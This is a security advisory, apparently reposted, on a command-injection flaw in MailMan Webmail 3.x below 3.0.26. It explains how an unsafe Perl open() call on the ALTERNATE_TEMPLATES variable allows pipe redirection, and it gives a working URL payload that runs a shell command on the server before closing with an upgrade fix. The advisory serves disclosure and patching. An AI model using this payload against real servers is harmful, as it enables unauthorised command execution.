|
Vulnerability MailMan Affected All 3.x versions of MailMan Webmail below 3.0.26 Description Following is based on a Secure Reality Advisories SRADV00005. MailMan is a product by Endymion corporation that provides a web based interface to email via POP3 and SMTP. MailMan is very popular due to its amazingly easy setup and operation. MailMan is written as a Perl CGI script, the version which is shipped to customers is obfuscated in an attempt to prevent piracy. The code contains several insecure calls to open() containing user specified data. These calls can be used to execute commands on the remote server with the permissions of the user that runs CGI scripts, usually the web server user which is in most cases 'nobody'. MailMan uses template files to define the appearance of the output so that customers can brand the software to their particular service (e.g ISP, Educational Institution). In previous versions of MailMan the location of the template files was static. Versions above 3 developed the ability to have multiple different sets of template files. The location of the template files is defined by a form variable called 'ALTERNATE_TEMPLATES'. When opening the alternate templates MailMan fails to specify the '<' operator to the infamous Perl open() statement, it then executes an open which looks like the following: open("$ALTERNATE_TEMPLATES_<action>.html"); Where <action> is a defined template name. Obviously since we have control of the $ALTERNATE_TEMPLATES variable we easily use pipe redirection to execute commands on the remote server. The following request will execute "id" on a vulnerable remote web server and return the output to the browser: /mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00 Please note that if $mailman::strLocalTemplateLocation is defined in the configuration section at the top of the script (it is commented out by default and is rarely enabled) this attack will fail since we won't be able to effect the beginning of the open string. Solution Please upgrade to the latest version of MailMan (3.0.26) at http://www.endymion.com/products/mailman/download.htm